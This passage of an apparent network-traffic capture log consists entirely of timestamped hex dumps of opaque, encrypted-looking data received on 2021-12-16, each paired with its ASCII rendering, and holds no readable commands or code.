ef 59 3b cc 36 9e a8 c4 8d 08 32 9d 4b c6 40 e4 56 1c f4 98 31 76 30 b6 a1 e7 fb 61 23 56 44
                                                        Data Ascii: G*3nvh+,c>)*XTlO%/`/^UZd(|*>>$Oj(TZyEtY?l&nUb]PuffIIg+x7b.k9UV+VH-3]jrM:LAQfY;62K@V1v0a#VD
                                                        2021-12-16 12:20:36 UTC189INData Raw: 20 c7 4b 96 c5 4a 8d b7 01 40 c2 2e 99 9c 30 5c 7d 89 f5 a1 c2 ad 94 51 3d 2c 4a e6 a3 c5 a8 cb 1a 42 0b 53 57 19 c1 53 cd de ce 47 fc f5 7d 12 5d 5b 13 a8 ff c0 93 be 50 61 8b 94 ae 55 b6 9d 4b 49 c0 d1 ae 82 11 26 d5 81 99 57 9c f1 b7 89 e2 bf be 9f 00 a8 6e 0f 42 1e 30 d3 7f 1a 6b c7 57 9d 8a 93 94 07 01 4d ac 61 fc ad f9 68 82 ac ed 35 e9 10 85 6c 5d 7d a9 92 66 68 0c fb be e6 03 67 b0 22 17 2a bd 2d 02 ca c9 f5 3f 9d 71 db 16 a7 48 1d 27 fd fc 3b 79 7b 71 c0 66 69 42 c9 c9 4f 2f 57 ee be 22 6d d1 04 b6 f0 2e d2 3f dc b3 cf 3d bb c3 a4 93 3c 88 83 7d aa ee 60 2a bb 9d 30 38 d6 36 77 e1 12 77 d4 b4 b5 57 e9 b6 7f d7 b3 5e 40 79 07 3e e2 98 40 fc f0 f3 36 91 84 68 fe a2 85 c1 16 ca 52 ef 5a c9 ad 43 85 b6 b9 d7 39 89 15 15 fa ee cf ed c6 0a 40 53 09 78
                                                        Data Ascii: KJ@.0\}Q=,JBSWSG}][PaUKI&WnB0kWMah5l]}fhg"*-?qH';y{qfiBO/W"m.?=<}`*086wwW^@y>@6hRZC9@Sx
                                                        2021-12-16 12:20:36 UTC191INData Raw: 2e 32 57 78 10 df a0 3d b9 82 c2 06 c4 ca 86 45 20 9c 50 d9 a4 03 b9 59 d7 65 85 98 9e ed bc 95 0c e4 66 69 83 17 85 bf 28 bf 74 3b 38 18 70 32 0a ed a0 68 c2 75 c7 61 16 b0 0e 61 06 ef 21 b5 1d 85 44 d1 94 0a a6 e1 82 1b 91 64 46 fc fb c0 92 1e c5 e6 dc dd 1d bd e2 31 05 a4 b7 84 70 d8 fe c2 93 a3 66 70 3a 95 88 dd cc b7 af 4b 1e db 79 9f 13 50 7c c5 f4 83 fa bd d0 40 b2 71 45 ba 01 89 df 3d ec c0 76 e2 f0 7c ac b1 63 5c 3b 41 7e bd be 6c d1 5b 90 9a b6 2c 63 ac c0 e5 c8 29 94 a8 e7 b4 f2 ee b4 4c ab c3 ac 2e 27 3a 9a 2a e6 b1 2c eb f0 a1 1a 2d 26 39 ca ea ee 53 43 a5 58 49 71 a5 a8 e0 b1 37 4e 0e 85 38 92 80 9f f2 ea 40 f7 a6 cf d6 ee b1 7d ef f6 0f f5 db 1f f3 9a 3d be 94 33 af 50 a0 49 8f a7 ea e2 4d fe f8 bd ed b8 1d d2 27 15 d2 5f d2 25 31 5f 06 6b
                                                        Data Ascii: .2Wx=E PYefi(t;8p2huaa!DdF1pfp:KyP|@qE=v|c\;A~l[,c)L.':*,-&9SCXIq7N8@}=3PIM'_%1_k
                                                        2021-12-16 12:20:36 UTC192INData Raw: f9 14 bb 33 cb a1 8c 00 4c d1 5d b0 5f 31 7a bd 12 db 3e 38 a5 d9 e4 1b 88 55 dc f0 78 86 0c 23 27 98 7f 6e 5a a0 09 97 db 8f 5c 86 86 34 00 4c 42 03 ff 74 cd 4a 92 65 3b 7c f1 4f 8c aa eb 90 50 69 fd 6f c8 38 22 4c 98 30 39 b2 95 1e 7d a0 2b 31 a3 a9 ed 03 be 88 12 61 fe 4a 8a a4 ab 1e de ec 19 42 93 50 0e 24 cc 02 c9 68 6f e7 19 36 1c 78 54 12 cd 15 ae 30 d3 bd cc e0 3d 17 a3 41 d0 06 29 be 37 65 a3 f4 11 d8 8a 42 71 b4 f5 87 e3 c3 ff cb 0b 95 3e 56 9d 62 d3 87 75 6f 0c d0 7e 3e 13 ae 45 74 e8 c0 40 ea da 79 ff 7e 9b 3f eb 0e ac d2 bc 67 0f 9a 90 74 b2 3b 62 93 8a e4 73 d0 b8 ef 5f 98 51 bc bd 0b bc fe f4 9b 3a 1f ba 67 5e 46 6e 2c d2 29 05 00 70 d7 06 6d c1 45 7b b0 ae c5 52 e7 b7 96 76 35 e8 4f 4d 35 ad 2b 24 59 db 3a d0 bf 8b 2e c8 34 50 af 14 19 9c
                                                        Data Ascii: 3L]_1z>8Ux#'nZ\4LBtJe;|OPio8"L09}+1aJBP$ho6xT0=A)7eBq>Vbuo~>Et@y~?gt;bs_Q:g^Fn,)pmE{Rv5OM5+$Y:.4P
                                                        2021-12-16 12:20:36 UTC193INData Raw: c4 59 78 d9 60 8e 0d 81 82 eb 32 b5 33 60 46 e9 c7 71 8d 74 07 38 8d ba b6 30 bf 8f bc 3c 70 c7 e1 b7 88 d6 d0 46 98 99 0c 18 6f c2 3f a9 74 65 bc 52 4f 23 91 f9 7c c9 b0 ef 6a c6 c6 31 b1 34 18 90 e9 b2 22 4f 8e cc d2 87 4c b7 ac cf f7 28 19 ec f6 a1 0e 33 b9 f3 8e 60 5a 8c 84 19 76 64 5a 3d af 3f b4 73 53 5b d9 88 48 a8 d4 24 db 35 6f 38 49 71 c5 dd b0 06 73 60 68 0b ce 82 6a ac 8a 66 ff ef 1a bd ca b4 c5 83 70 ef 59 7f 44 1b 8c 64 69 9d 5f 40 b1 98 2f 72 ae bb cd 01 03 c0 ae ca 98 35 e7 f8 42 a7 c0 2e 2b 36 2a c5 37 3b 98 70 ff fc a4 98 28 7a 2e 1a cb c0 53 1f b3 39 5c f9 a1 f4 9c 9c 03 5d 0c bc 45 4c b8 04 da d3 3c ac a3 e1 d5 d7 ac ee e9 55 27 a9 c5 0b c3 5d 38 da b5 95 96 c0 a1 2d af 98 cd c7 4b f7 de 17 dc 9c 1d 53 00 b7 f9 e3 d4 44 14 57 0e 70 8e
                                                        Data Ascii: Yx`23`Fqt80<pFo?teRO#|j14"OL(3`ZvdZ=?sS[H$5o8Iqs`hjfpYDdi_@/r5B.+6*7;p(z.S9\]EL<U']8-KSDWp
                                                        2021-12-16 12:20:36 UTC194INData Raw: f3 1d 10 68 de 9d 29 0b 40 55 d8 29 53 bc 3e db 7f a0 9a 59 43 52 04 0e 48 2b 14 d0 d7 e2 df 2f c7 e3 16 60 1b 09 c0 13 06 de 13 e4 d2 19 4e 3a ac 59 45 db 11 4e be 50 ac f8 2b 8d c6 d4 c9 a9 4d 9e 62 4e dc f9 e1 27 b4 f5 04 4b 35 18 38 f7 0d 58 7d 54 d8 84 c7 d8 24 84 78 c3 f5 41 7d ef 5b 12 ec 2f 87 25 0c d2 84 0e 0e 80 f1 75 7b 49 e7 36 72 a9 d7 b1 1f 4c 21 1d 89 4d 9f 05 c0 40 af bc 29 53 5b 15 15 7c c2 d8 21 33 ce 86 da 07 97 f9 d5 42 d8 9b 3f cf d7 03 09 5c f4 7c 81 bb be ec 67 ba 08 e5 83 6e 90 04 67 9b a0 bf 68 2d 73 3f e4 35 2d f9 e3 4f 7a 72 df 5d a4 b0 8e 7f 98 d0 6f a8 79 9e e8 f7 bb 3b 25 e6 92 01 e2 4c c8 fb b8 d2 e1 18 1d e5 d9 c1 b3 bf b9 34 11 b3 c5 83 76 dc d5 e9 c5 a8 0e 79 66 8a 0a d2 92 a6 ac 7e 8d c9 60 8d 9b 61 c0 d1 60 96 c0 ae b7
                                                        Data Ascii: h)@U)S>YCRH+/`N:YENP+MbN'K58X}T$xA}[/%u{I6rL!M@)S[|!3B?\|gngh-s?5-Ozr]oy;%L4vyf~`a`
                                                        2021-12-16 12:20:36 UTC195INData Raw: 49 e7 0f b4 e5 de b6 c3 db ea 40 9c da 2d cc 8d 1f 3f b4 49 ed 70 78 f4 6c f6 d0 cf e7 61 9d 98 09 14 93 35 56 62 03 f7 0a 17 22 7b 00 b2 8e f5 a3 e2 f1 f3 e8 5b fe f4 f0 88 bc 57 a4 7b d5 df 55 b3 19 86 c3 e7 58 56 f3 53 eb 16 87 72 57 73 d2 6f 04 fd 45 13 15 74 b8 56 8c 86 f9 d1 2c c6 f1 19 3b 24 9f ce 07 cc cb cc 69 09 92 15 ae f4 74 72 3e a5 c0 d6 e2 c9 0f 14 04 d4 84 84 d8 69 f0 59 e6 37 f5 38 e1 56 3e c0 f8 42 11 e7 1a b0 ce 5e 1d d3 fd fa 93 14 c6 9d 72 0c 78 1c 93 94 86 d8 a3 7b 56 ae 54 3a 70 f5 00 f9 bc be 77 86 97 51 72 28 16 6d c8 45 e0 4a ea 0a 3b 12 f6 7e 61 aa ba a9 0e 5d 90 5b ee 01 1c 74 b6 00 66 9f d2 2a cf e3 86 08 c9 91 9d 2e 0c b0 39 55 97 0b 4b e1 e4 2c a8 da 9a 0a 5d 11 08 77 0d 43 88 5d 5f e6 de 53 43 27 44 46 2a 2d 65 0c db d2 09
                                                        Data Ascii: I@-?Ipxla5Vb"{[W{UXVSrWsoEtV,;$itr>iY78V>B^rx{VT:pwQr(mEJ;~a][tf*.9UK,]wC]_SC'DF*-e
                                                        2021-12-16 12:20:36 UTC197INData Raw: 1c 3b 3d df da da 0a 65 00 da 48 e9 bd 33 8e 7e c3 3f 58 48 07 06 6b ec 2a 03 85 d6 85 78 2e f4 b5 14 23 b5 08 f7 45 07 9b bc e5 e7 4f 4c 7d 00 58 78 8d 10 29 20 25 86 b1 7f 8d 49 b0 ca f6 05 c8 9f 2e fd f9 81 71 4a 97 2b 4b 50 4e c7 93 22 58 19 02 fb e1 ea d8 67 d3 5c 82 d9 41 3b b8 7e 55 c6 2f c0 72 2a 97 ae 0e 44 d7 d6 16 53 49 84 61 5a c8 ff b1 79 1b 08 7a 5f 4d f8 52 ea 25 79 bc 70 3b 71 40 44 35 b6 ae ca 77 f6 ee 8e 42 d1 ad 6e 04 b1 9b 3c 94 6a 43 60 5c f3 27 3e f9 d7 ec 64 e1 c9 a9 ef 6e 85 5f 5b fa c1 bf 73 76 dc 5b f1 35 08 a5 4c 29 7b 72 8d 1c d6 f2 b6 66 8c 90 2f f5 6d 87 fd ae 91 64 16 e6 a4 58 9a 04 ee fb 8a 8a 0b 7b b5 e4 de 9e 3d dd aa 33 2e ed a4 e2 40 db 0c b7 14 ed 65 71 1d da 46 9d d2 b6 c7 34 0d 9d 6f 9e 79 2f 6f 8d 87 82 6a e0 6e 0a
                                                        Data Ascii: ;=eH3~?XHk*x.#EOL}Xx) %I.qJ+KPN"Xg\A;~U/r*DSIaZyz_MR%yp;q@D5wBn<jC`\'>dn_[sv[5L){rf/mdX{=3.@eqF4oy/ojn
                                                        2021-12-16 12:20:36 UTC198INData Raw: a5 7c 95 c7 f1 b8 ff f7 ce 75 ee 81 5d e5 8c 1b 13 ab 44 bb 42 20 f2 65 ca d1 ce ee 52 c8 fd 30 22 a5 29 50 72 03 f5 1b 39 12 77 1a de fe 9c b1 d4 fa e5 b2 08 90 f3 fb 80 bb 6d 89 70 a1 a5 14 e7 28 91 e2 fb 58 4b a3 0e 8f 21 e2 45 52 4f d0 6f 71 bd 20 22 7a 5a b3 56 e0 c1 8a ff 1a da d7 19 25 30 8e fb 20 ca d5 c8 3e 7b 82 0e a8 e5 1d 6e 35 b0 ed da f1 9e 5c 28 14 86 f6 b1 c3 59 ff 58 fe 65 a4 4a e7 41 3a c1 b1 4a 00 d1 68 c2 f5 5c 1d d0 e8 ab c2 14 d8 bc 29 68 67 1c 81 83 b2 f6 a8 0f 2a f9 3d 02 52 c5 3a e4 a9 e8 24 86 84 50 77 1e 3e 6d db 11 d6 09 cc 00 16 19 ec 3b 3e cb e4 d3 2a 0a b9 0a ab 7d 5f 28 cc 5e 26 dd 8d 7b 89 e2 ce 56 e1 c7 e1 6d 4b e7 62 04 d2 0d 6c d0 95 70 ed 85 e8 2d 7e 3d 2e 4a 31 54 db 1a 00 87 db 5a 52 78 58 57 02 60 08 55 e4 dc 0f 8c
                                                        Data Ascii: |u]DB eR0")Pr9wmp(XK!EROoq "zZV%0 >{n5\(YXeJA:Jh\)hg*=R:$Pw>m;>*}_(^&{VmKblp-~=.J1TZRxXW`U
                                                        2021-12-16 12:20:36 UTC199INData Raw: 29 11 af f8 8f 4d 48 21 8e 50 cc d8 51 88 11 c3 01 3d 58 06 7f 7e dc 2a 16 b5 a2 bd 6e 41 d8 97 71 0e 97 5c ca 63 62 de ac 8c cd 7c 1f 52 37 2a 55 db 53 21 28 21 b8 8a 4c 8d 6a a1 cc fd 23 cd eb 3d de 9a 97 52 38 91 7d 2c 51 6c 98 bf 1a 2e 1e 26 92 e7 d2 ac 66 f1 30 b5 fb 33 1a ef 19 75 e5 70 c5 50 58 a2 9c 60 78 c3 a3 1b 70 3c 94 53 5a e8 c9 c1 69 39 7a 7a 08 0c ee 75 86 2b 4d dd 47 3a 6c 79 06 19 aa bd af 7f fe ef 8e 48 cb 90 0b 25 9d d8 10 a0 06 62 5b 28 df 10 50 fd ee 9f 46 b9 81 95 c3 1e b3 62 39 ca fc cc 60 41 b2 4c cc 35 2a 98 38 1d 46 01 9a 2b b8 c3 8a 66 8c a5 40 c2 51 87 fc 9e e2 52 20 95 86 01 ce 3e ce ab 8a a1 78 7c ec b6 d8 b1 58 cb 80 56 4b f7 d6 e1 78 af 0e ee 59 da 53 05 37 e3 27 aa fc f2 e7 02 68 bc 54 ea 5b 75 28 a0 a9 c9 6e c3 0c 07 6a
                                                        Data Ascii: )MH!PQ=X~*nAq\cb|R7*US!(!Lj#=R8},Ql.&f03upPX`xp<SZi9zzu+MG:lyH%b[(PFb9`AL5*8F+f@QR >x|XVKxYS7'hT[u(nj
                                                        2021-12-16 12:20:36 UTC200INData Raw: 7b a3 f8 fe 91 f4 fa c5 12 ad a6 48 fa a5 08 2a a1 62 b7 2c 1c f6 67 e3 be ff df 14 97 dd 2a 1e 9f 23 50 7f 0b 91 39 5c 01 57 00 e2 d3 91 bf ff f3 81 88 10 8d d2 f0 84 f6 46 9f 74 d6 85 09 d4 63 a0 fb cf 51 4b ae 06 eb 02 90 7c 5e 78 dd 68 52 f9 71 14 0e 4f bf 4c d8 b4 ad f5 0b de d4 1d 61 65 a9 ea 14 cc d7 cb 5b 4c a5 1f ac f0 78 59 31 b0 d3 fc f6 89 66 23 03 e7 d1 be d2 4f da 56 e2 64 85 59 c7 52 0c d0 c3 45 0b b6 2e f4 f5 46 3a d1 e6 ad c3 47 ff ab 2e 62 4d 79 b5 95 a7 c1 bf 66 11 f9 20 0b 4f d2 26 f1 a1 e3 24 d5 b1 46 7a 22 38 03 ff 1b bb 3a df 17 17 2f f6 3d 3e c4 ef 90 1f 06 82 1b d9 51 5f 2b 85 77 35 c6 b5 6a fb c9 c5 56 88 fa dd 61 4e fc 7b 08 bc 2d 09 f7 a9 6d ef 89 f7 6c 54 22 2a 53 2c 6c dd 68 3d 89 ec 7a 58 16 76 12 38 7a 29 5f f8 da 6d 87 8b
                                                        Data Ascii: {H*b,g*#P9\WFtcQK|^xhRqOLae[LxY1f#OVdYRE.F:G.bMyf O&$Fz"8:/=>Q_+w5jVaN{-mlT"*S,lh=zXv8z)_m
                                                        2021-12-16 12:20:36 UTC202INData Raw: 2e b2 9d c8 67 2d 1d b7 29 fa d4 3d be 2d d4 18 3d 4d 3f 06 69 dc 5e 3a 92 b7 91 48 7d c2 91 71 01 8e 08 f4 76 73 8c 8f 96 d1 76 22 49 33 0b 44 a9 75 2f 28 51 9d 9d 4f e1 5b a1 db fa 38 ec fa 2e c6 f9 84 42 3e ab 38 25 50 57 a1 a5 00 2a 1a 35 96 86 ff aa 5c f4 28 ae dd 35 0d 8a 1f 7d 91 68 e3 51 78 b5 88 7b 69 f3 a2 24 70 3b 83 57 37 ab e5 d4 70 23 7a 66 5b 39 ec 60 8b 2f 2e db 56 27 5c 5b 14 19 ab b9 c2 31 f8 e7 9f 58 fe aa 0f 34 88 f6 7f ab 0f 73 67 0c d7 0d 5f d2 8f 8e 4e b9 aa 8c b7 0a 89 07 3c fd ed e0 59 5a b9 52 a9 46 08 89 13 06 57 17 87 44 80 d1 9a 0a bb 8e 4a c5 7d f3 dd 9a 91 45 2a 92 bc 47 f3 20 d2 a8 92 a0 7f 7c 81 e4 f2 b7 58 cb 92 47 22 da c3 d7 60 a8 1f 8b 79 af 59 1c 5e e7 2b d9 db cf ef 03 68 af 47 f7 5d 34 03 a2 b2 f0 62 ce 06 05 0b 3e
                                                        Data Ascii: .g-)=-=M?i^:H}qvsv"I3Du/(QO[8.B>8%PW*5\(5}hQx{i$p;W7p#zf[9`/.V'\[1X4sg_N<YZRFWDJ}E*G |XG"`yY^+hG]4b>
                                                        2021-12-16 12:20:36 UTC203INData Raw: 92 a8 de 87 f7 e6 c6 10 c3 9c 63 f8 85 05 1b bc 43 bb 32 0c f6 66 ea be e3 e5 24 ce f4 2d 19 bf 37 5c 63 0d e5 17 56 1b 57 16 e2 d9 85 a2 f8 fb ef db 3a 91 c5 fe 8c ac 47 95 76 c4 9c 13 da 22 87 96 ef 44 45 b5 0c 8e 2a 96 56 4b 59 d9 6b 43 a6 2a 29 7a 5a b3 56 e0 f0 9c e9 2a cd ce 08 23 38 95 f0 66 d6 dc d8 04 4d b3 0f ae f2 74 6d 24 ad dd c1 82 9c 6a 39 3b b4 f0 b1 c3 49 ca 73 f7 72 a2 4a da 43 2b cd de 42 65 82 57 c3 ee 54 39 93 db b9 c9 60 e2 b4 22 22 69 16 9c 83 a7 e3 ac 66 09 fd 30 2b 67 c5 2a e2 bc e6 2e e8 c5 71 7d 3a 36 71 d3 1a d6 19 ca 17 1b 12 e5 0c 38 c7 f8 f1 39 00 a2 00 c5 38 63 39 eb 30 37 d7 92 41 ca d4 d9 5d c3 cc d1 47 52 ff 67 61 b5 2f 7d fb 83 76 f2 8a ee 09 75 29 0f 4b 32 6c ba 0f 0c 92 e6 77 5b 0c 5a 77 15 51 0a 47 f8 bd 3e 8f 8d 7c
                                                        Data Ascii: cC2f$-7\cVW:Gv"DE*VKYkC*)zZV*#8fMtm$j9;IsrJC+BeWT9`""if0+g*.q}:6q898c907A]GRga/}vu)K2lw[ZwQG>|
                                                        2021-12-16 12:20:36 UTC204INData Raw: be ef ee 67 48 21 bf 5b bc f8 3f b8 11 c4 0f 2a 7c 33 74 6f d4 4f 11 b5 a4 e2 68 40 c2 86 66 60 a1 61 c7 50 68 b0 9c 80 d3 6d 29 48 56 1a 59 b5 71 3c 3c 17 b6 8a 44 ec 4e a1 db db 4c f9 fa 3b f4 ba 8c 4a 3a 81 09 2e 46 18 94 93 06 2e 1a 26 b8 e9 d1 a8 50 f0 39 b3 8e 26 1a 9b 21 54 ff 5c d4 40 59 bf 95 78 69 f2 d6 04 61 3d b9 72 34 d8 fa d4 6e 23 64 69 6d 3f 9e 56 8f 36 6d d0 5a 23 61 78 25 0a bd 8e c6 54 e8 e7 99 07 fd 95 22 29 9e fe 0d cc 0c 75 38 3b c4 7f 7d d7 fd ec 67 d0 bb e1 f1 02 8b 68 29 98 da cd 75 4f a8 5a f9 47 02 97 29 2c 57 37 98 36 b9 c2 ef 25 a3 ac 4e c3 64 f5 d7 9d f4 41 3b a3 91 73 f5 3e b7 a8 8e a7 5b 6b 83 8e d8 a4 49 fc 81 41 24 c6 a4 d7 76 b8 00 8b 60 ea 4d 03 31 f2 46 be ed c2 dd 20 78 b6 57 fb 4c 31 0a a6 b4 ef 6a d6 3d 0d 7b 17 f9
                                                        Data Ascii: gH![?*|3toOh@f`aPhm)HVYq<<DNL;J:.F.&P9&!T\@Yxia=r4n#dim?V6mZ#ax%T")u8;}gh)uOZG),W76%NdA;s>[kIA$v`M1F xWL1j={
                                                        2021-12-16 12:20:36 UTC205INData Raw: c1 f0 9b e3 93 f8 0c de 9c 48 e0 c7 3d 3b bc 54 f0 10 1d f8 7c e8 df d8 ce 2a df ea 21 0e 83 2e 56 7f 1f 91 19 5c 01 4d 27 ef df 99 a3 f5 f1 c8 b5 2e 92 c9 f7 88 b4 4d 9d 70 d3 8d 13 da 22 87 e5 ae 45 47 b4 3e a2 2a 81 7f 46 5e d9 52 59 88 29 28 18 5c ba 6d cf d1 8b fb 3d d6 c8 16 24 51 a9 e7 15 d1 dc c1 75 4a b9 10 a1 e5 7e 69 39 ab dc dc 82 88 6a 39 3b aa e5 a8 de 51 cc 5a d3 74 b5 57 de 52 2b cd d2 7e 00 b5 47 c2 ff 52 20 d4 e6 a2 d4 14 d8 ad 35 65 44 1e a1 80 bf f8 b9 40 17 ec 3d 01 71 d3 49 c5 ad e8 24 fe 8a 44 67 25 30 6d cf 74 b1 2f ca 3a 35 0e ed 3a 27 d9 88 f7 2e 1d 8e 2c c3 59 43 3f 85 77 35 c6 a5 76 e8 d2 d8 31 cf cc dc 4a 50 e9 6e 04 97 24 6a cb b4 7b e9 9f 9a 11 69 23 3f 41 28 2c ee 01 04 83 cb 45 37 2a 64 7c 18 7c 08 55 de d8 01 90 8b 65 95
                                                        Data Ascii: H=;T|*!.V\M'.Mp"EG>*F^RY)(\m=$QuJ~i9j9;QZtWR+~GR 5eD@=qI$Dg%0mt/:5:'.,YC?w5v1JPn$j{i#?A(,E7*d||Ue
                                                        2021-12-16 12:20:36 UTC207INData Raw: fe dd 6f 5e 20 b6 5d bc f0 22 bc 3c cf 12 0a 49 21 73 62 cd 2a 16 b5 a2 bd 78 5d d3 91 55 07 86 66 c7 13 50 bb 88 a6 cd 70 29 54 22 58 63 b6 64 3e 06 3d b0 9d 47 f9 3a 86 c7 da 38 fb f2 61 e6 98 8d 46 2d 91 10 2e 5a 6c c7 ae 19 34 3a 38 9e eb d9 b6 51 84 1d b5 fa 20 1c 87 13 75 ff 5b 86 60 44 a6 90 7c 63 ee bb 12 6a 3d e6 6e 37 c7 ec de 7e 39 65 7a 66 39 9e 62 8f 36 71 ec 52 21 66 79 30 78 9e bd db 61 fe f0 8e 69 dd fa 09 23 9d c4 3c b9 18 75 5d 32 c2 7f 77 ef ca 82 47 e9 a6 88 d9 1a e4 60 3e ec c6 f3 7f 4d bd 53 ec 5b 09 ad 23 26 4d 06 ea 23 b3 c4 b0 25 a0 bc 41 c5 34 e0 dd 83 ce 76 26 85 88 42 f5 39 d9 8f eb 94 6e 6d af 8c dc b5 7e d6 86 5d 3f b4 e1 ea 7d 9a 08 8d 71 df 4b 71 1c e5 21 b0 e6 f7 e1 0d 68 ab 41 9e 7c 36 1d bc ad f6 4f df 0d 1a 72 06 ff a3
                                                        Data Ascii: o^ ]"<I!sb*x]UfPp)T"Xcd>=G:8aF-.Zl4:8Q u[`D|cj=n7~9ezf9b6qR!fy0xai#<u]2wG`>MS[#&M#%A4v&B9nm~]?}qKq!hA|6Or
                                                        2021-12-16 12:20:36 UTC208INData Raw: 9f a6 e9 e0 df 10 c0 c6 7e e8 8a 1c 2c ad 54 a7 6c 3b ed 70 f4 ca c5 ec 20 ce e8 2c 04 f0 20 5c 65 33 d0 0d 4a 10 7f 0c ed c5 f5 91 f4 e0 c4 a3 0c 9d d3 e1 80 b6 65 ac 66 d2 89 0a d1 21 90 96 c9 53 56 9f 20 8f 20 90 76 40 49 fa 7a 5a a6 29 3e 7a 70 a3 4e cb dd 89 f6 30 bf e6 16 2e 51 b8 f2 09 c6 d2 ef 34 79 af 7c 9e f9 6e 69 35 a9 9c fd f7 95 7b 24 09 82 aa 83 d2 4e d0 56 fe 68 bb 59 c7 5a 30 ca 9f 6a 0a a3 43 d1 ee 45 31 cf fa e2 e5 7d e5 b8 35 75 2a 1e 97 84 8c c5 a2 7b 06 f4 04 06 66 d3 20 f4 a9 e3 0c e3 a8 5b 61 35 5f 40 ce 11 b7 3e db 21 1b 0e e7 2c 23 c5 fa e9 4b 0e b4 1b f4 6a 54 2b ec 43 24 c0 9f 1e ee c5 df 6e cb c8 d8 62 5e e1 7d 18 d2 1b 7c c5 bc 77 ef 95 9a 2d 60 0f 0e 55 30 63 d6 01 1d 9f b9 59 47 27 58 7c 09 64 10 51 fa d4 19 99 ee 70 83 35
                                                        Data Ascii: ~,Tl;p , \e3Jef!SV v@IzZ)>zpN0.Q4y|ni5{$NVhYZ0jCE1}5u*{f [a5_@>!,#KjT+C$nb^}|w-`U0cYG'X|dQp5
                                                        2021-12-16 12:20:36 UTC209INData Raw: 97 0c 0d 54 db 3b 3c 38 55 fb 7f a1 67 5e 2c 51 0e 00 b7 28 61 d0 d7 e0 23 28 b6 e2 06 e0 72 06 b6 13 07 c3 f8 80 a4 39 4c 28 d6 c5 35 db 11 4f 57 38 dd f8 28 8c 34 d3 be aa 4d 90 91 4d ac f9 e1 26 44 e5 fd ee 37 1e d5 9b 72 78 7d 46 96 88 be dd 05 86 5d cf 92 45 7f ee 76 1e 97 28 85 39 27 c1 dd 0a 0c 81 d8 7e 01 49 e6 24 da 6a ad 91 1d 5e 88 da 0c 4d 9f 08 e4 41 2e bc 2f 43 04 11 4a 6a 59 15 bd b1 4e 90 6b d2 bb 7a b7 48 ef 9b 7e de ea da 36 59 b6 7f 2c 3f 6a ea 03 b8 c8 f3 37 8b e0 27 5a 99 91 ba 30 2e ce bf 78 30 4d fd 5e cf f6 74 ca 45 d7 a2 6f b3 dc ce 27 a3 b4 4a aa 77 40 30 cf 33 fe 04 88 cc 46 f3 f7 db 08 39 ec ee b7 e7 3e b8 fd 22 cb 41 b5 04 e0 df 6b ef 1c b3 38 51 5d 88 5b dc 80 be 85 4e 0e da 28 9b 36 7d 6a c5 df 83 05 b4 6b 6f 09 64 d6 ab a7
                                                        Data Ascii: T;<8Ug^,Q(a#(r9L(5OW8(4MM&D7rx}F]Ev(9'~I$j^MA./CJjYNkzH~6Y,?j7'Z0.x0M^tEo'Jw@03F9>"Ak8Q][N(6}jkod
                                                        2021-12-16 12:20:36 UTC210INData Raw: 38 ea 01 bb f2 a0 65 21 89 84 7d b3 29 c3 13 bd f6 5f cc e5 f2 69 84 09 be e0 16 bf fe ee 87 46 0c 9c 69 5e 5a 13 23 e4 3b 75 1d f2 d2 2d 6c 8e 59 ca b1 8d d9 0b f5 42 99 40 29 b0 41 90 26 8b 36 3b 5b 2b 3b f3 be d2 3c fd 38 5e b3 14 17 81 2c 1b 92 b1 b3 31 10 69 41 30 a7 e4 93 5b 19 1d bd df 98 4e 4f 4f 79 75 ca e9 11 2e bd 3f 84 fe d0 b0 82 5f 5e fd 19 b9 9b dc 7e f7 69 19 5e 5e 1a 7d 6b dd 81 93 08 2b 45 db 28 a2 bd 4d dc 6b b2 eb d5 2d 4c 06 08 99 28 64 d8 c5 e2 25 2e b5 ff 08 7d ff 15 bd 15 07 dd f6 f9 bd 1b 48 3a 57 5a 2c de 30 4f 56 51 d1 ff 3c 9f bb 40 bf b7 4c 8f 8f 4e aa ec f1 a6 c7 f5 63 4b 21 0a 46 7b 75 46 7f d4 5b 81 ff d6 30 96 dd 58 8f 54 6d 6e 3a 13 9f 21 84 2b 24 cc ec 1c 8d 19 d7 79 0a 5b 67 ab 4f b9 29 28 1c 5e 89 5f 06 58 8c 84 ae 41
                                                        Data Ascii: 8e!})_iFi^Z#;u-lYB@)A&6;[+;<8^,1iA0[NOOyu.?_^~i^^}k+E(Mk-L(d%.}H:WZ,0OVQ<@LNcK!F{uF[0XTmn:!+$y[gO)(^_XA
                                                        2021-12-16 12:20:36 UTC211INData Raw: 33 91 7c ea f8 b4 9d 37 7f 25 1f cc d1 d0 2a a0 3a 35 f9 a3 f0 e2 9c 12 5d 07 bb 3e 51 ae 19 de db 4b a4 b5 e1 d5 d2 bc e7 f9 55 27 b4 df 04 d1 5a 39 cb 15 08 83 c8 bd 2a 80 84 df da 4c ea f9 0b c0 92 00 4f 3e b3 f2 61 cf 56 b2 43 08 73 92 86 8b cc 3e 6f 06 6c 64 89 83 c1 bb 4c 31 34 d9 a5 a2 5c 9e 6f 76 56 62 62 cd c1 cc 8c 19 5e a3 ac 41 c2 0a 57 30 83 8d 8c b0 2d 68 01 d0 37 2c 8e 08 d6 bd 8d 77 9d 91 a5 7b b8 fa af 80 eb 67 50 cc 28 c3 47 65 9a 07 99 bb a2 83 4f aa 84 58 6f 72 62 31 0c 69 8c 7b 24 70 1a 66 9c b9 e7 54 88 89 84 d5 74 fb b4 17 f8 ca 80 fc 08 a4 f1 62 ae 48 f4 93 a0 38 3f c5 73 69 65 ff 16 2e 3f a1 1e 25 4d 5c 5a 7f 33 c4 4b b8 94 fb 9b 5a bf b4 79 5a 51 f8 8b 74 27 b4 ae 55 07 cb 79 d0 85 14 1a 55 d9 b7 a5 9f fe 07 45 68 e7 81 d1 a5 be
                                                        Data Ascii: 3|7%*:5]>QKU'Z9*LO>aVCs>oldL14\ovVbb^AW0-h7,w{gP(GeOXorb1i{$pfTtbH8?sie.?%M\Z3KZyZQt'UyUEh
